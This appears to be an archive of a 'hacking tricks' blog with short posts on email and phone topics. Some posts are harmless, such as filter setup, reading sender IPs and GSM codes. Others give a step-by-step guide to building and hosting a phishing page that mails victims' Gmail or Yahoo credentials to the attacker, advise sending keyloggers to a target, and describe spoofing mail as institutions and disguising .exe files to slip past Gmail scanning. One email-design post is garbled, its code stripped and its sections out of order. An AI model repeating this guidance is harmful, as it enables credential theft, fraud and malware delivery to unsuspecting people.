Showing posts with label Email Hacks. Show all posts
Showing posts with label Email Hacks. Show all posts

How To Block Unwanted Emails And Spamming


 Do you want to  block emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well here is a way to block all those unwanted and annoying emails that you do not want to see or read! With this trick you can block individual email address or the whole domain from which you do not want the emails to come from. Here are the step-by-step instructions to do this.
For Gmail
1. Login to your account
2. At the top-right corner, click on Settings
3. Under Settings, click on Filters
4. You’ll now see an option “Create a new filter“, click on it
5. Now in the From field enter the email address from which you do not want to receive the emails
For ex. you may enter john@gmail .com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax: *@xyz.com. Now all the incoming emails from the domain xyz.com will be blocked.
6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.
For Yahoo
1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. In the left panel select the option Filters and click on create or edit filters
5. Now click on Add
6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.
Fox ex. john@gmail.com or if you want to block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.
For Hotmail
1. Login to your account
2. At the top-right corner, click on Options
3. A drop down menu appears, now click on More options
4. Click on Safe and blocked senders link under Junk e-mail
5. Now click on Blocked senders
6. Type in the email address that you want to block under blocked e-mail address or domain field.
For ex. Enter john@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.
That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. pass your comments!

10:03 AM by Shubham Mittal · 0

How to find the IP address of the email sender in Gmail, Yahoo! mail or Hotmail


When you receive an email, you receive more than just the message.
The email comes with headers that carry important information that can
tell where the email was sent from and possibly who sent it.
For that, you would need to find the IP address of the sender.

The tutorial below can help you find the IP address of the sender.
Note that this will not work if the sender uses anonymous proxy servers.


Finding IP address in Gmail
1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original

4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets.
In this case, it is

65.119.112.245.

That is be the IP address of the sender!
5. Track the IP address of the sender.


Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail

5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ].

Here, it is 202.65.138.109.
That is be the IP address of the sender!

6. Track the IP address of the sender


Finding IP address in Hotmail



1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail

5. If you find a header with X-Originating-IP: followed by an IP address,
that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59].
Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.
anyknownserver.com.
9. Track the IP address of the sender

6:50 AM by Shubham Mittal · 3

Use Firefox As Your Ethical Hacking Platform And Toolkit


Internet is an amazing virtual world where you can "virtually" do anything: gambling, playing, watching movies,
shopping, working, “VoIPying”, spying other people and for sure auditing remote systems.
The security testers’ community has a large panel of security tools, methodologies and much more to perform
their pentests and audit assessments. But what happens if you find yourself weaponless.
No more Top 100 security tools, no more LiveCDs and no more exploitation frameworks. A security auditor
without toolbox is like a cop without gun.


Nevertheless, there is maybe a way to rescue yourself from this nightmare situation.
The magical solution could be Firefox and its extensions developed by ethical hackers and coders.
This article comes as an update for what we posted previously about how to switch your Firefox to more than an usual simple browser. It was about application auditing.

Here is an updated list of useful security auditing extensions:
Information gathering
● Whois and geo-location

o ShowIP : Show the IP address of the current page in the status bar. It also allows querying
custom services by IP (right mouse button) and Hostname (left mouse button), like whois,
netcraft.
o Shazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping)
enables the user with one-click to map and geo-locate any website they are currently
viewing.
o HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info
data. Works with all versions of Firefox.
o Active Whois : Starting Active Whois to get details about any Web site owner and its host
server.
o Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It
includes (WhoIs, DNS Report, Geolocation, Traceroute, Ping). Very useful for information
gathering phase
● Enumeration / fingerprinting
o Header Spy : Shows HTTP headers on statusbar
o Header Monitor : This is Firefox extension for display on statusbar panel any HTTP
response header of top level document returned by a web server. Example: Server (by
default), Content-Encoding, Content-Type, X-Powered-By and others.
● Social engineering
o People Search and Public Record : This Firefox extension is a handy menu tool for
investigators, reporters, legal professionals, real estate agents, online researchers and
anyone interested in doing their own basic people searches and public record lookups as
well as background research.

● Googling and spidering

o Advanced dork : Gives quick access to Google’s Advanced Operators directly from the
context menu. This could be used to spider a site or scan for hidden files (this spider
technique is used via scroogle.org)
o SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from
www.httrack.com.
o View Dependencies : View Dependencies adds a tab to the "page info" window, in which it
lists all the files which were loaded to show the current page. (useful for a spidering
technique)
Security Assessment / Code auditing
● Editors
o JSView : The ’view page source’ menu item now opens files based on the behaviour you
choose in the jsview options. This allows you to open the source code of any web page in
a new tab or in an external editor.
o Cert Viewer Plus : Adds two options to the certificate viewer in Firefox or Thunderbird: an
X.509 certificate can either be displayed in PEM format (Base64/RFC 1421, opens in a new
window) or saved to a file (in PEM or DER format - and PKCS#7 provided that the
respective patch has been applied - cf.
o Firebug : Firebug integrates with Firefox to put a wealth of development tools at your
fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript
live in any web page
o XML Developer Toolbar : Allows XML Developer’s use of standard tools all from your
browser.
● Headers manipulation
o HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response
header of top level document returned by a web server. Example: Server (by default),
Content-Encoding, Content-Type, X-Powered-By and others.
o RefControl : Control what gets sent as the HTTP Referrer on a per-site basis.
o User Agent Switcher : Adds a menu and a toolbar button to switch the user agent of the
browser
● Cookies manipulation
o Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved
cookies.
o CookieSwap : CookieSwap is an extension that enables you to maintain numerous sets or
"profiles" of cookies that you can quickly swap between while browsing
o httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as
httpOnly on the browser side
o Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt
file
● Security auditing
o HackBar : This toolbar will help you in testing SQL injections, XSS holes and site security. It
is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site.
Its main purpose is to help a developer do security audits on his code.
o Tamper Data : Use “tamper data” to view and modify HTTP/HTTPS headers and post
parameters.
o Chickenfoot : Chickenfoot is a Firefox extension that puts a programming environment in
the browser’s sidebar so you can write scripts to manipulate web pages and automate web
browsing. In Chickenfoot, scripts are written in a superset of JavaScript that includes
special functions specific to web tasks.
Tuning Firefox to an Ethical Hacking Platform
Proxy/web utilities
● FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s
proxy configuration. It offers more features than SwitchProxy, ProxyButton, QuickProxy, xyzproxy,
ProxyTex, etc
● SwitchProxy : SwitchProxy lets you manage and switch between multiple proxy configurations
quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes
● POW (Plain Old WebServer) : The Plain Old Webserver uses Server-side JavaScript (SJS) to run a
server inside your browser. Use it to distribute files from your browser. It supports Server-side JS,
GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your
site. Users have created a wiki, chat room and search engine using SJS.
Misc
● Hacks for fun
o Greasemonkey : Allows you to customize the way a webpage displays using small bits of
JavaScript (scripts could be download here)
● Encryption
o Fire Encrypter : FireEncrypter is a Firefox extension which gives you encryption/decryption
and hashing functionalities right from your Firefox browser, mostly useful for developers or
for education & fun.
Malware scanner
● QArchive.org web files checker : Allowing people to check web files for any malware (viruses,
trojans, worms, adware, spyware and other unwanted things) inclusions.
● Dr.Web anti-virus link checker : This plugin allows you to check any file you are about to download,
any page you are about to visit
● ClamWin Antivirus Glue for Firefox : This extension scans every downloaded file automatically with
ClamWin.
Anti Spoof
● refspoof : Easy to pretend to origin from a site by overriding the URL referrer (in a http request). —
It incorporates this feature by using the pseudo-protocol spoof:// .. Thus it’s possible to store the
information in a "hyperlink" - that can be used in any context... like html pages or bookmarks


Feel free to send us (upgoingstar@yahoo.co.in) any useful information about security and audit oriented
Firefox extensions.

10:23 AM by Shubham Mittal · 0

How To Send Fake OR Anonymous Emails


Below is list of 4 Fake email service that allow you to send fake email to anyone .This service is maily used to prank yours friends and relatives ,you can prank by sending mail  on name of any website or Institute  like orkut@orkut.com or any other email id,Try it and Enjoy ! :P
  • FakeMailer.Info – Helps you to send Fake eMails and Prank your Friends! You Can Enter any sender Name-Email you want and scare your Friends About their bills,Notice About their illegal internet activity or anything else you may want! Dont Forget To phone them after to tell that is just a prank.
  • Anonymailer.net – Is the most trusted anonymous email service that send anonymous email every day over hundreds of free anonymous emails are sent from this website,  You can use whatever e-mail address you like as a reply address.
  • Deadfake -Use this web to send an email to whoever you want. You can make it looks like it’s coming from anyone you like. Just fill in the form and  press send.
  • Fakemymail is another Fake email service that send fake email this service allows you to send free prank emails   to your friends and family. Send prank emails and fake emails to anyone you want for a funny email prank anytime of day or night.
  • AnonymousSpeech.com is a Professional provider for secure anonymous email, Here you need to create account to use this service,watch below video to know much more about this service .
  • Fake Email PrankFunny bloopers are a click away
Note: X-( By sending a fake email or prank email you may be committing the offence of fraud even you did not intend to. You are not allowed to use this service for any illegal activities at any time.All above r fake email service is not liable for your emails you send at any time. :-|

1:55 PM by Shubham Mittal · 0

20 Email Design Best Practices and Resources for Beginners : Hacking Tricks



1: Keep the Design Simple

Emails are not like complex website designs; they should be nicely designed, but somewhat basic. Try basing your designs on a main header image followed by the main content.

The cleaner the design, the easier it will be to code, and the less chance of any abnormalities happening between various browsers and email clients.

2: Use Tables

Email clients live in the past, so all emails must be built using tables for layout. Some CSS styling can be used, but we will discuss this later.

Not Accepted

 

Lorem ipsum dolor sit amet.
f

Accepted

 









Header 1
Lorem ipsum dolor sit amet.
Sign off and footer

3: Have Web Browsers at the Ready

Make sure you have as many web browsers as possible available to you. Who knows who will view your email, and what he or she will be using to view it!

At the very least, use these:

  • Internet Explorer 6
  • Internet Explorer 7
  • Internet Explorer 8
  • Mozilla Firefox 3
  • Apple Safari 3
  • Google Chrome

4: Sign Up for all the Major Email Clients

Sign up for as many email accounts as you can think of. Below is a list of email clients to get you started:

Please note that they're are other, more convenient services that can be used instead; however, many of these charge monthly fees. For more information, review Litmusapp.

5: Use Inline Styles

If this were the website world, every developer on the planet would say, "do not use inline styles, create a class for it". Unfortunately, in an email, this is not possible, as the email clients will strip them out, and we don't want that. So if anything needs to be styled, use inline styles.

Elements like font type and size can be used within the

tag, but individual styles should be placed on

Will Work

 



14: Hotmail Bug Fixes

Over the past couple of years, Microsoft has vastly improved the Hotmail/Live service. But... one huge bug you will come across is the strange padding added to all images. Why do they do this? Who knows? All I know is, there is a wonderfully easy fix.

 

On every image tag, simply add display:block, as shown above.

15: Encode All Characters

Although we don't technically have to encode characters, it's best we do.

When viewing emails in various email clients, we cannot guarantee the charset every website is using, so encoding characters allows us to be certain that all characters are being displayed as they should.

May Work

 "Some sample code - with special characters"

Will Definitely Work

 "Some sample code - with special characters"

16: JavaScript = Junk Email

You cannot, unfortunately, include any type of JavaScript. So no fancy pop-ups or auto-scrolling emails please! If you do decide to include it anyway, your email may be sent to the junk folder. Email clients will see you as a threat. And this is obviously not good. So please stick to plain old HTML.

17: Give the User a Way Out

When sending general newsletters to various clients/customers, although you have a lovely designed and developed email, that user may not want your email (hard to take, I know). Always allow them a way out, by adding an unsubscribe link to the bottom of the email, like so:

If you would like to unsubscribe from this newsletter, simply click here

18: Users Want Options

Some users may be utilizing a very basic email client - maybe they're checking there webmail at work or on their phones. Images and complex designs may not be best for these types of clients,. Consider, at the top of the email newsletter, having a link which points to the email on a web server somewhere, so the user can view the email in all its glory.

Cannot view this email? View it here

19: Use a spacer.gif

Some browsers (Internet Explorer), don't get on with empty




Will Work

 



20: Send Tests

This is the most important aspect of email design; sending test emails allows you to view them in all browsers and email clients, looking for any bugs and odd variations.

I have setup a way to allow me to send test, by all means, use mine!

Username: test
Password: nettuts

For more comprehensive testing, use a service like CampaignMonitor or LitmusApp.



's.

6: Give all Images Alt Tags

This is a very important step to take, but is often forgotten by many. Styling the

for which images are in, with font types, size and color, will allow for your email to degrade gracefully when images are off by default.

No Alt Tags

Alt Tags

7: Do not Set Widths or Heights to Images

Again, this is a further step to take in order for a lovely gracefully degraded email. If images are off by default, there dimensions will be present, leaving a lot of unnecessary white space throughout.

8: Wrap the Email in a 100% Width Table

Email clients only take the code within the body tags, not the body tags themselves. In order to use a background color, you must create a 100% width table to "fake" the background effect.

 








Lorem ipsum dolor sit amet.


9: No Wider than 600px

Many people don't actually open their email; they instead view them in the preview panel. On average the smallest preview panel is around 600px, so always design your emails accordingly, unless you don't want your full email viewable in the preview panel, of course.

10: Link Styling

Don't forget to style the tag. This will overwrite the email client's standard link tags.

 Link

11: Try not to Nest Tables

Apart from the 100% width wrap table, you should try your best not to nest additional tables. This is easily avoidable; use the stacking system instead.

This allows for a much easier, controllable email.

Avoid

 











Lorem ipsum dolor sit amet.






Lorem ipsum dolor sit amet.


Use

 



Lorem ipsum dolor sit amet.





Lorem ipsum dolor sit amet.

12: Avoid Background Images

Stick to block colors rather than images for the backgrounds for your text; only use funky gradients, images, etc. when no text is involved.

13: Borders don't Work

Within emails, we don't have much room for browser or email clients specific fixes, so when we have borders that can either sit outside or inside the

or be included or excluded from the width, there's not much we can do.

The fix? Drop two extra

's to either side of the main , and set the background color in each one. This will again "fake" the look of a border and work in all browsers and email clients.

Won't Work

 
Lorem ipsum Lorem ipsum dolor sit amet. 's. Even if the is set to 10px in width. IE will ignore this and set it to 0.

The fix is to add a transparent GIF, and set this to 10px wide. This then provides you with something to put within the

, thus fixing IE's issues with having empty 's.

Won't Work

 
Lorem ipsum dolor sit amet Lorem ipsum dolor sit ametLorem ipsum dolor sit amet Lorem ipsum dolor sit amet

4:06 AM by Shubham Mittal · 0

How to hack, Crack, Find Lost Messenger Passwords


MessenPass – Free Software to Hack, Crack or Find Lost Messenger Passwords

Despite the fact that the title of this post mentions about Breaking MSN Messenger Passwords, this utility can be used to find your forgotten passwords of any of the following IM clients.

  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP And Vista)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby

It is an impressive list and contains almost all of the popular IM Client applications.

How to Use MessenPass to View or Find Lost IM Passwords.

When you run MessenPass, it automatically detects the Instant Messenger applications installed on your computer, decrypts the passwords they store, and displays all user name/password pairs that it found in the main window of MessenPass. If from some reason, MessenPass fails to locate the installed Instant Messenger application, you can try to manually select the right folder of your IM application by using ‘Select Folders’ option (from the File menu).

On the main window of MessenPass, you can select one or more password items, and then copy them to the clipboard in tab-delimited format (you can paste this format into Excel or Open-Office Spreadsheet), or save them into text/html files.

crack IM passwords

MessenPass can be used without any installation process, simply by running the executable file (mspass.exe) from the zip file, which you will get when you download this application from the link given below.


Download It here

9:29 PM by Shubham Mittal · 0

Reveal Passwords Behind *** Asterisks - Learn Latest Computer And Mobile Hackign Tricks


Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.


javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox

4:41 AM by Shubham Mittal · 0

Send Exe file Through Gmail - Learn Latest Computer And Mobile Hacking Tricks


* Open your My computer or explorer window.On the top menu beside file,edit and view,you can find tools.Now go to folder options in it.A window will pop up.
* In the window click on the view tab.Now find Hide extensions for known file types and uncheck it.Now click Ok.

* Go to the .exe file or some other file which is to be sent over the Gmail.
* Now change the file extension of the file to other extensions which Gmail allows like .jpeg or .GIF [For e.g If the file hdd.exe is to be sent,rename it to hdd.jpeg] and send the file.If you have a large file,do the above steps and then Zip it.You cant send just by zipping , as gmail scans extensions in zip files also.
* At the recievers end,after downloading the file,ask them to get it renamed again to the original file extension.

6:35 AM by Shubham Mittal · 0

General Network Service Commands - GSM Commands - Learn Latest Computer And Mobile Hakcing Tricks


There are some pre-programmed network commands under “SIM Services” options in mobilephones. When various “Network services/SIM Services” functions are selected, the phone generates and transmits the corresponding network command. However besides “SIM Services, there are many other commands as well, that can be manually entered and executed.
Generally every command is prefixed with either one or two *(Star Key) or #(Hash Key) as follows:
* Activate
*XYZ* Register and Activate
#XYZ# De-Register (and Deactivate)
# Deactivate

*XYZ# Check Status (Where XYZ is a certain number varying from network to network)
© Call Key/Green Key/OK Key
NOTE that most of the commands given are network service provider dependent and you should contact your service provider for codes if any code does not work.

To execute, each command has to be entered/pressed at idle screen and must be sent to the network by pressing “Call/Yes/OK/Green Key” which is represented here with the © character. Remember to enter numbers in full international format wherever required like for example “ + Country Code then area code etc (+91567890123)

Command ---------- Description (Function Executed)



1. SECURITY RELATED COMMANDS
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©

2. CALL FORWARD (DIVERT)
De-register all call forward ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©
Unconditionally divert all calls to number and activate **21*number#©
Activate divert all calls *21#©
De-register divert all calls ##21#©
Deactivate divert all calls #21#©
Check status of divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Activate Divert on not reachable to number **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©

3. CALL WAITING
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©

4. CALL BARRING
Activate barring all outgoing calls (see Security above to set code) **33*code#©
Deactivate barring all outgoing calls #33*code#©
Check status of barring all outgoing calls *#33#©
Activate barring all calls **330*code#©
Deactivate barring all calls #330*code#©
Check status of barring all calls *#330*code#©
Activate barring all outgoing international calls **331*code#©
Deactivate barring all outgoing international calls #331*code#©
Check status of barring all outgoing international calls *#331#©
Activate barring all outgoing international calls except to home country **332*code#©
Deactivate barring all outgoing international calls except to home country #332*code#©
Check status of barring all outgoing international calls except to home country *#332#©
Activate barring all outgoing calls **333*code#©
Deactivate barring all outgoing calls #333*code#©
Check status of barring all outgoing calls *#333#©
Activate barring all incoming calls **35*code#©
Deactivate barring all incoming calls #35*code#©
Check status of barring all incoming calls *#35#©
Activate barring all incoming calls when roaming **351*code#©
Deactivate barring all incoming calls when roaming #351*code#©
Check status of barring all incoming calls when roaming *#351#©
Activate barring all incoming calls **353*code#©
Deactivate barring all incoming calls #353*code#©

5. CALLER LINE IDENTIFICATION
NOTE: Only works if CLIP and CLIR are enabled (ask service provider)
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one's own number to the receiver party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©

6. GSM NETWORK SERVICE CODES
11 Speech
13 fax
25 data




6:20 AM by Shubham Mittal · 0

Get **** Asterisks Password From Browsers- Learn Latest Computer And Mobile Hacking Tricks


Here is the simplest tweak.

Go get it..

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.


3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

5:58 AM by Shubham Mittal · 2

Method Of Cracking The Email Password - Learn Latest Computer And MObile hacking Tricks


One of the most successful method is achieved with the used of k*ylo**ers and s** software. There are lots of s*y*are, lo**ing tools available today such as 007, RemoteSpy, Netvizor, Email Spy, Chat Spy, Spector Pro, eBlaster, Invisible Keylogger, to name a few. This software will create a self extracting or installation file, you can then run it in the computer for surveillance, or email it to your target. The only question is, how can you convinced the recipient to open it?


Most hackers does not really HACK passwords by penetrating Yahoo, Hotmail, Gmail, and AOL servers, instead they will go for the easy way - the end user, that's you. It's not what you see on the movies such like "Hackers," "SwordFish," and so on. Too good to be true! They don't actually hack, but logs every stroke on your keyboard including the passwords you have input.
Keep in mind that computer surveillance Programs should be used only if necessary, it was not created to invade someone's privacy. If you are going to use it, be a responsible user.

11:06 PM by Shubham Mittal · 0

Create A fake Login Page- Learn Latest Computer And MObile hacking Tricks


Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you
The process of Hacking anyone’s id using fake login pages is known as Phishing

Now let’s learn how to create your very own fake login page.


{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.
{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it.
Now you can view it by typing the url in the address bar.
NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.
I suppose that you created your account at 110mb.com
now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.
Now you can access you file on the net by just typing the url ofthe file.
And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form.
see my fake login page
www.citkatboy.110mb.com/index.html

1:16 AM by Shubham Mittal · 2

Send A Tracked E-mail- Learn Latest Computer And MObile hacking Tricks


How do I send a tracked email? There are two ways you can send tracked emails:

1. Simply add: .mailtracking.com to the end of your recipients email address (they won't see this)
or
2. Install our ActiveTracker plugin to add the tracking for you.

Testing? If you send tracked emails to yourself, your anti-spam filters may block them (people don't usually write to themselves) - so we recommend you test by sending to other people. email tracking - The Ethical Hacking What will you tell me about the tracked emails I send? MailTracking will endeavour to provide the following in your tracking reports:


* Date and time opened
* Location of recipient (per their ISP city /town)
* Map of location (available on paid subscriptions)
* Recipients IP address
* Apparent email address of opening (if available)
* Referrer details (ie; if accessed via web mail etc)
* URL clicks
* How long the email was read for
* How many times your email was opened
* If your email was forwarded, or opened on a different computer

1:10 AM by Shubham Mittal · 0